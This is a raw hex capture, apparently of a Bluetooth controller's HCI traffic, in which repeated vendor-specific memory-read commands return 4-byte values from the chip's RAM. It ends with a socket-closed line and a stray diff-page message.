RX 0000000b0000000b000000030000000000e27beebfb0c5cf
RX 040e08014dfc003c3c3c50
TX 014dfc059036210004
RX 0000000b0000000b000000030000000000e27beebfb12794
RX 040e08014dfc002100b82a
TX 014dfc05b436210004
RX 0000000b0000000b000000030000000000e27beebfb187f5
RX 040e08014dfc0021000000
TX 014dfc05d836210004
RX 0000000b0000000b000000030000000000e27beebfb2093d
RX 040e08014dfc0038372100
TX 014dfc05fc36210004
RX 0000000b0000000b000000030000000000e27beebfb26af0
RX 040e08014dfc00077f0006
TX 014dfc052037210004
RX 0000000b0000000b000000030000000000e27beebfb2e7d2
RX 040e08014dfc0005ca05ca
TX 014dfc054437210004
RX 0000000b0000000b000000030000000000e27beebfb35c0b
RX 040e08014dfc00ff14ff14
TX 014dfc056837210004
RX 0000000b0000000b000000030000000000e27beebfb3e988
RX 040e08014dfc004b5a5a5a
TX 014dfc058c37210004
RX 0000000b0000000b000000030000000000e27beebfb45c21
RX 040e08014dfc0001030105
TX 014dfc05b037210004
RX 0000000b0000000b000000030000000000e27beebfb4dbda
RX 040e08014dfc00646c2000
TX 014dfc05d437210004
RX 0000000b0000000b000000030000000000e27beebfb56e46
RX 040e08014dfc00fdf9f5f1
TX 014dfc05bc06200030
RX 0000003700000037000000030000000000e27beebfb5f264
RX 040e34014dfc00dc06200060003e0078362100783621003e02252100000000000000003d00d187fc0620000c011400b84d2100c44e2100
TX 014dfc057836210004
RX 0000000b0000000b000000030000000000e27beebfb6719b
RX 040e08014dfc00d8362100
TX 014dfc05dc36210004
RX 0000000b0000000b000000030000000000e27beebfb6f22a
RX 040e08014dfc00078c8c8c
TX 014dfc054037210004
RX 0000000b0000000b000000030000000000e27beebfb78409
RX 040e08014dfc00ff14ff14
TX 014dfc05a437210004
RX 0000000b0000000b000000030000000000e27beebfb7e7fd
RX 040e08014dfc0001030105
TX 014dfc050838210004
RX 0000000b0000000b000000030000000000e27beebfb8720d
RX 040e08014dfc0000000000
TX 014dfc056c38210004
RX 0000000b0000000b000000030000000000e27beebfb8f49f
RX 040e08014dfc0010101010
TX 014dfc05d038210004
RX 0000000b0000000b000000030000000000e27beebfb970cc
RX 040e08014dfc000a0602fe
TX 014dfc053439210004
RX 0000000b0000000b000000030000000000e27beebfb9fa64
RX 040e08014dfc0004080c10
TX 014dfc059839210004
RX 0000000b0000000b000000030000000000e27beebfba7925
RX 040e08014dfc0000000003
TX 014dfc05fc39210004
RX 0000000b0000000b000000030000000000e27beebfbaf5de
RX 040e08014dfc00706f7d75
TX 014dfc05603a210004
RX 0000000b0000000b000000030000000000e27beebfbb6de7
RX 04
RX 0e08014dfc0071718d87
TX 014dfc05c43a210004
RX 0000000b0000000b000000030000000000e27beebfbbef45
RX 040e08014dfc0050615d54
TX 014dfc05283b210004
RX 0000000b0000000b000000030000000000e27beebfbc7293
RX 040e08014dfc0058666d60
TX 014dfc058c3b210004
RX 0000000b0000000b000000030000000000e27beebfbcf44e
RX 040e08014dfc000a07ee03
TX 014dfc05f03b210004
RX 0000000b0000000b000000030000000000e27beebfbd79e9
RX 040e08014dfc007d756d75
TX 014dfc05543c210004
RX 0000000b0000000b000000030000000000e27beebfbddc7d
RX 040e08014dfc008d877c81
TX 014dfc05b83c210004
RX 0000000b0000000b000000030000000000e27beebfbea57f
RX 040e08014dfc005d54575f
TX 014dfc051c3d210004
RX 0000000b0000000b000000030000000000e27beebfbf66d7
RX 040e08014dfc006d605c6c
TX 014dfc05803d210004
RX 0000000b0000000b000000030000000000e27beebfbfe3ac
RX 040e08014dfc000e782220
TX 014dfc05e43d210004
RX 0000000b0000000b000000030000000000e27beebfc06663
RX 040e08014dfc000d0d0d0d
TX 014dfc05483e210004
RX 0000000b0000000b000000030000000000e27beebfc0e82a
RX 040e08014dfc000000000d
TX 014dfc05ac3e210004
RX 0000000b0000000b000000030000000000e27beebfc16d41
RX 040e08014dfc00c4012c53
TX 014dfc05103f210004
RX 0000000b0000000b000000030000000000e27beebfc1f727
RX 040e08014dfc0000005d5d
TX 014dfc05743f210004
RX 0000000b0000000b000000030000000000e27beebfc27c7f
RX 040e08014dfc00c401ec53
TX 014dfc05d83f210004
RX 0000000b0000000b000000030000000000e27beebfc303b4
RX 040e08014dfc0038402100
TX 014dfc053c40210004
RX 0000000b0000000b000000030000000000e27beebfc37e0c
RX 040e08014dfc00c50104ec
TX 014dfc05a040210004
RX 0000000b0000000b000000030000000000e27beebfc403b0
RX 040e08014dfc000000005e
TX 014dfc050441210004
RX 0000000b0000000b000000030000000000e27beebfc48af4
RX 040e08014dfc0001c401ac
TX 014dfc056841210004
RX 0000000b0000000b000000030000000000e27beebfc50eab
RX 040e08014dfc00d90000e1
TX 014dfc05cc41210004
RX 0000000b0000000b000000030000000000e27beebfc58f7c
RX 040e08014dfc0001c4016c
TX 014dfc053042210004
RX 0000000b0000000b000000030000000000e27beebfc6124e
RX 040e08014dfc00e00000e8
TX 014dfc059442210004
RX 0000000b0000000b000000030000000000e27beebfc69521
RX 040e08014dfc0001648c58
TX 014dfc05f842210004
RX 0000000b0000000b000000030000000000e27beebfc799ac
RX 040e08014dfc00ff000301
TX 014dfc055c43210004
RX 0000000b0000000b000000030000000000e27beebfc7f96c
RX 040e08014dfc005f000055
TX 014dfc05c043210004
RX 0000000b0000000b000000030000000000e27beebfc8be02
RX 040e08014dfc0000001000
TX 014dfc052444210004
RX 0000000b0000000b000000030000000000e27beebfc97cd4
RX 040e08014dfc00f40757b8
TX 014dfc058844210004
RX 0000000b0000000b000000030000000000e27beebfc9fb7f
RX 040e08014dfc0000001400
TX 014dfc05ec44210004
RX 0000000b0000000b000000030000000000e27beebfca7b49
RX 040e08014dfc0000040000
TX 014dfc055045210004
RX 0000000b0000000b000000030000000000e27beebfcaf1bd
RX 040e08014dfc0000002c00
TX 014dfc05b445210004
RX 0000000b0000000b000000030000000000e27beebfcb4f74
RX 040e08014dfc0000100000
TX 014dfc051846210004
RX 0000000b0000000b000000030000000000e27beebfcbc8f9
RX 040e08014dfc007c0a50bc
TX 014dfc057c46210004
RX 0000000b0000000b000000030000000000e27beebfcc4c7c
RX 040e08014dfc0008040007
TX 014dfc05e046210004
RX 0000000b0000000b000000030000000000e27beebfcccdd1
RX 040e08014dfc0000000400
TX 014dfc054447210004
RX 0000000b0000000b000000030000000000e27beebfcd61ba
RX 040e08014dfc0000010301
TX 014dfc05a847210004
RX 0000000b0000000b000000030000000000e27beebfcdd9d4
RX 040e08014dfc0015032003
TX 014dfc050c48210004
RX 0000000b0000000b000000030000000000e27beebfce573c
RX 040e08014dfc00fb010502
TX 014dfc057048210004
RX 0000000b0000000b000000030000000000e27beebfced915
RX 040e08014dfc006a023402
TX 014dfc05d448210004
RX 0000000b0000000b000000030000000000e27beebfcf5e63
RX 040e08014dfc0003db03a2
TX 014dfc053849210004
RX 0000000b0000000b000000030000000000e27beebfcfe29a
RX 040e08014dfc0098492100
TX 014dfc059c49210004
RX 0000000b0000000b000000030000000000e27beebfd07253
RX 040e08014dfc0001a901e0
TX 014dfc05004a210004
RX 0000000b0000000b000000030000000000e27beebfd0f677
RX 040e08014dfc0003540397
TX 014dfc05644a210004
RX 0000000b0000000b000000030000000000e27beebfd177de
RX 040e08014dfc00402020e0
TX 014dfc05c84a210004
RX 0000000b0000000b000000030000000000e27beebfd1ecc8
RX 040e08014dfc00030105f8
TX 014dfc052c4b210004
RX 0000000b0000000b000000030000000000e27beebfd27677
RX 040e08014dfc0004000400
TX 014dfc05904b210004
RX 0000000b0000000b000000030000000000e27beebfd2f7ed
RX 040e08014dfc0062005100
TX 014dfc05f44b210004
RX 0000000b0000000b000000030000000000e27beebfd377f2
RX 040e08014dfc0002000200
TX 014dfc05584c210004
RX 0000000b0000000b000000030000000000e27beebfd3fa30
RX 040e08014dfc0000000000
TX 014dfc05bc4c210004
RX 0000000b0000000b000000030000000000e27beebfd47ac6
RX 040e08014dfc0098036000
TX 014dfc05204d210004
RX 0000000b0000000b000000030000000000e27beebfd4faa6
RX 040e08014dfc0000000000
TX 014dfc05844d210004
RX 0000000b0000000b000000030000000000e27beebfd57b25
RX 040e08014dfc002e61319e
TX 014dfc05e84d210004
RX 0000000b0000000b000000030000000000e27beebfd68943
RX 040e08014dfc0000000000
TX 014dfc054c4e210004
RX 0000000b0000000b000000030000000000e27beebfd6e941
RX 040e08014dfc0000000000
TX 014dfc05dc06200030
RX 0000003700000037000000030000000000e27beebfd76aa7
RX 040e34014dfc00fc0620000c011400b84d2100c44e2100120126e200000000000000001100c658e8af200040040a00a8622100a8622100
TX 014dfc05b84d210004
RX 0000000b0000000b000000030000000000e27beebfd7ee80
RX 040e08014dfc0000000000
TX 014dfc05c84e210004
RX 0000000b0000000b000000030000000000e27beebfd96b03
RX 040e08014dfc003f700000
TX 014dfc05d84f210004
RX 0000000b0000000b000000030000000000e27beebfda244b
RX 040e08014dfc0020533819
TX 014dfc05e850210004
RX 0000000b0000000b000000030000000000e27beebfda66a2
RX 040e08014dfc0013001001
TX 014dfc05f851210004
RX 0000000b0000000b000000030000000000e27beebfdb1dc1
RX 040e08014dfc0010010f25
TX 014dfc050853210004
RX 0000000b0000000b000000030000000000e27beebfdb7163
RX 040e08014dfc0000e25213
TX 014dfc051854210004
RX 0000000b0000000b000000030000000000e27beebfdbf1d4
RX 040e08014dfc00010f42ec
TX 014dfc052855210004
RX 0000000b0000000b000000030000000000e27beebfdc6f47
RX 040e08014dfc005194ac0a
TX 014dfc053856210004
RX 0000000b0000000b000000030000000000e27beebfdcb335
RX 040e08014dfc00da0700ba
TX 014dfc054857210004
RX 0000000b0000000b000000030000000000e27beebfdd2fda
RX 040e08014dfc000016f194
TX 014dfc055858210004
RX 0000000b0000000b000000030000000000e27beebfddad73
RX 040e08014dfc00f1feba00
TX 014dfc056859210004
RX 0000000b0000000b000000030000000000e27beebfde2c17
RX 040e08014dfc00be000022
TX 014dfc05785a210004
RX 0000000b0000000b000000030000000000e27beebfdeab0c
RX 040e08014dfc000010010f
TX 014dfc05885b210004
RX 0000000b0000000b000000030000000000e27beebfdf3561
RX 040e08014dfc000000e807
TX 014dfc05985c210004
RX 0000000b0000000b000000030000000000e27beebfdfb04a
RX 040e08014dfc00b8000072
TX 014dfc05a85d210004
RX 0000000b0000000b000000030000000000e27beebfe0406a
RX 040e08014dfc00030008f1
TX 014dfc05b85e210004
RX 0000000b0000000b000000030000000000e27beebfe0b02f
RX 040e08014dfc0087f04cbe
TX 014dfc05c85f210004
RX 0000000b0000000b000000030000000000e27beebfe13b72
RX 040e08014dfc0008b90000
TX 014dfc05d860210004
RX 0000000b0000000b000000030000000000e27beebfe1b919
RX 040e08014dfc000c01003a
TX 014dfc05e861210004
RX 0000000b0000000b000000030000000000e27beebfe23d75
RX 040e08014dfc001936c92b
TX 014dfc05fc06200030
RX 0000003700000037000000030000000000e27beebfe2d3c5
RX 040e34014dfc00e8af200040040a00a8622100a86221000a006a1400000000000000000a006b3f7be9b581f1177b3f21f7dd9df06e0ae2
TX 014dfc05a862210004
RX 0000000b0000000b000000030000000000e27beebfe3be35
RX 040e08014dfc00e8662100
TX 014dfc05ec66210004
RX 0000000b0000000b000000030000000000e27beebfe43b8f
RX 040e08014dfc00c350d687
TX 014dfc05306b210004
RX 0000000b0000000b000000030000000000e27beebfe4bb96
RX 040e08014dfc00e3c78237
TX 014dfc05746f210004
RX 0000000b0000000b000000030000000000e27beebfe53d42
RX 040e08014dfc0019aac824
TX 014dfc05b873210004
RX 0000000b0000000b000000030000000000e27beebfe5cb61
RX 040e08014dfc0069d31cf3
TX 014dfc05fc77210004
RX 0000000b0000000b000000030000000000e27beebfe62cc9
RX 040e08014dfc003d11e110
TX 014dfc05407c210004
RX 0000000b0000000b000000030000000000e27beebfe6edcb
RX 040e08014dfc0027e57831
TX 014dfc058480210004
RX 0000000b0000000b000000030000000000e27beebfe7abd5
RX 040e08014dfc00fcdaacf0
TX 014dfc05c884210004
RX 0000000b0000000b000000030000000000e27beebfe82d02
RX 040e08014dfc007ffa8079
TX 014dfc050c89210004
RX 0000000b0000000b000000030000000000e27beebfe8ad55
RX 040e08014dfc000de1ad99
TX 014dfc05e8af200030
RX 0000003700000037000000030000000000e27beebfe92db8
RX 040e34014dfc0008b020002c040400288d2100288d21000400000000000000000000000400000028b0200044041000d89d2100d89d2100
TX 014dfc05288d210004
RX 0000000b0000000b000000030000000000e27beebfea302d
RX 040e08014dfc0054912100
TX 014dfc055891210004
RX 0000000b0000000b000000030000000000e27beebfeab08c
RX 040e08014dfc00b437b423
TX 014dfc058895210004
RX 0000000b0000000b000000030000000000e27beebfeb6dbf
RX 040e08014dfc00f7ab1031
TX 014dfc05b899210004
RX 0000000b0000000b000000030000000000e27beebfec2d1e
RX 040e08014dfc001bbf2c9c
TX 014dfc0508b0200030
RX 0000003700000037000000030000000000e27beebfeced03
RX 040e34014dfc0028b0200044041000d89d2100d89d21001000000000000000000000001000000048b0200008010f0018e2210018e22100
TX 014dfc05d89d210004
RX 0000000b0000000b000000030000000000e27beebfee2b3a
RX 040e08014dfc001ca22100
TX 014dfc0520a2210004
RX 0000000b0000000b000000030000000000e27beebfeeb20b
RX 040e08014dfc0030c8795b
TX 014dfc0568a6210004
RX 0000000b0000000b000000030000000000e27beebfef3414
RX 040e08014dfc0061d5fb13
TX 014dfc05b0aa210004
RX 0000000b0000000b000000030000000000e27beebfefb326
RX 040e08014dfc008a3dc78e
TX 014dfc05f8ae210004
RX 0000000b0000000b000000030000000000e27beebff037e1
RX 040e08014dfc00c9dcb769
TX 014dfc0540b3210004
RX 0000000b0000000b000000030000000000e27beebff0bcf1
RX 040e08014dfc00e2722f0c
TX 014dfc0588b7210004
RX 0000000b0000000b000000030000000000e27beebff13a07
RX 040e08014dfc006c0b98fc
TX 014dfc05d0bb210004
RX 0000000b0000000b000000030000000000e27beebff1b621
RX 040e08014dfc00101603ea
TX 014dfc0518c0210004
RX 0000000b0000000b000000030000000000e27beebff238f0
RX 040e08014dfc005c915487
TX 014dfc0560c4210004
RX 0000000b0000000b000000030000000000e27beebff2c19c
RX 040e08014dfc00cb41f3b2
TX 014dfc05a8c8210004
RX 0000000b0000000b000000030000000000e27beebff343ab
RX 040e08014dfc00db93b18f
TX 014dfc05f0cc210004
RX 0000000b0000000b000000030000000000e27beebff3c416
RX 040e08014dfc005c5ca405
TX 014dfc0538d1210004
RX 0000000b0000000b000000030000000000e27beebff44634
RX 040e08014dfc00fd2d6388
TX 014dfc0580d5210004
RX 0000000b0000000b000000030000000000e27beebff49ff4
RX 040e08014dfc00c17ab6d8
TX 014dfc05c8d9210004
RX 0000000b0000000b000000030000000000e27beebff52099
RX 040e08014dfc00355e57a9
TX 014dfc0510de210004
RX 0000000b0000000b000000030000000000e27beebff59fe5
RX 040e08014dfc00e4b02aa9
TX 014dfc0528b0200030
RX 0000003700000037000000030000000000e27beebff623a6
RX 040e34014dfc0048b0200008010f0018e2210018e221000f00000000000000000000000f0000000000000008010f0090f1210090f12100
TX 014dfc0518e2210004
RX 0000000b0000000b000000030000000000e27beebff6a64a
RX 040e08014dfc0020e32100
TX 014dfc0524e3210004
RX 0000000b0000000b000000030000000000e27beebff72534
RX 040e08014dfc0000000000
TX 014dfc0530e4210004
RX 0000000b0000000b000000030000000000e27beebff7a5ab
RX 040e08014dfc0000000000
TX 014dfc053ce5210004
RX 0000000b0000000b000000030000000000e27beebff82694
RX 040e08014dfc0000000000
TX 014dfc0548e6210004
RX 0000000b0000000b000000030000000000e27beebff8a61a
RX 040e08014dfc0000000000
TX 014dfc0554e7210004
RX 0000000b0000000b000000030000000000e27beebff927c7
RX 040e08014dfc0000000000
TX 014dfc0560e8210004
RX 0000000b0000000b000000030000000000e27beebff9a88a
RX 040e08014dfc0000000000
TX 014dfc056ce9210004
RX 0000000b0000000b000000030000000000e27beebffa2be9
RX 040e08014dfc0000000000
TX 014dfc0578ea210004
RX 0000000b0000000b000000030000000000e27beebffb2a19
RX 040e08014dfc0000000000
TX 014dfc0584eb210004
RX 0000000b0000000b000000030000000000e27beebffba771
RX 040e08014dfc0000000000
TX 014dfc0590ec210004
RX 0000000b0000000b000000030000000000e27beebffc2aab
RX 040e08014dfc0000000000
TX 014dfc059ced210004
RX 0000000b0000000b000000030000000000e27beebffcab4a
RX 040e08014dfc0000000000
TX 014dfc05a8ee210004
RX 0000000b0000000b000000030000000000e27beebffd2dfe
RX 040e08014dfc0000000000
TX 014dfc05b4ef210004
RX 0000000b0000000b000000030000000000e27beebffdadbc
RX 040e08014dfc0000000000
TX 014dfc05c0f0210004
RX 0000000b0000000b000000030000000000e27beebffe2cdf
RX 040e08014dfc0000000000
TX 014dfc0548b0200030
RX 0000003700000037000000030000000000e27beebffeae8a
RX 040e34014dfc000000000008010f0090f1210090f121000f00000000000000000000000f00000000000000000000000000000000000000
TX 014dfc0590f1210004
RX 0000000b0000000b000000030000000000e27beebfff6dfb
RX 040e08014dfc0098f22100
TX 014dfc059cf2210004
RX 0000000b0000000b000000030000000000e27beec0002edc
RX 040e08014dfc0000000000
TX 014dfc05a8f3210004
RX 0000000b0000000b000000030000000000e27beec000acf4
RX 040e08014dfc0000000000
TX 014dfc05b4f4210004
RX 0000000b0000000b000000030000000000e27beec0012d10
RX 040e08014dfc0000000000
TX 014dfc05c0f5210004
RX 0000000b0000000b000000030000000000e27beec001b570
RX 040e08014dfc0000000000
TX 014dfc05ccf6210004
RX 0000000b0000000b000000030000000000e27beec0027363
RX 040e08014dfc0000000000
TX 014dfc05d8f7210004
RX 0000000b0000000b000000030000000000e27beec00333bd
RX 040e08014dfc0000000000
TX 014dfc05e4f8210004
RX 0000000b0000000b000000030000000000e27beec003b50a
RX 040e08014dfc0000000000
TX 014dfc05f0f9210004
RX 0000000b0000000b000000030000000000e27beec00452d7
RX 040e08014dfc0000000000
TX 014dfc05fcfa210004
RX 0000000b0000000b000000030000000000e27beec004d362
RX 040e08014dfc0000000000
TX 014dfc0508fc210004
RX 0000000b0000000b000000030000000000e27beec0055367
RX 040e08014dfc0000000000
TX 014dfc0514fd210004
RX 0000000b0000000b000000030000000000e27beec005da0f
RX 040e08014dfc0000000000
TX 014dfc0520fe210004
RX 0000000b0000000b000000030000000000e27beec0065a28
RX 040e08014dfc0000000000
TX 014dfc052cff210004
RX 0000000b0000000b000000030000000000e27beec006dc92
RX 040e08014dfc0000000000
TX 014dfc053800220004
RX 0000000b0000000b000000030000000000e27beec0075df4
RX 040e08014dfc0000000000
Socket closed

Some files were not shown because too many files have changed in this diff Show More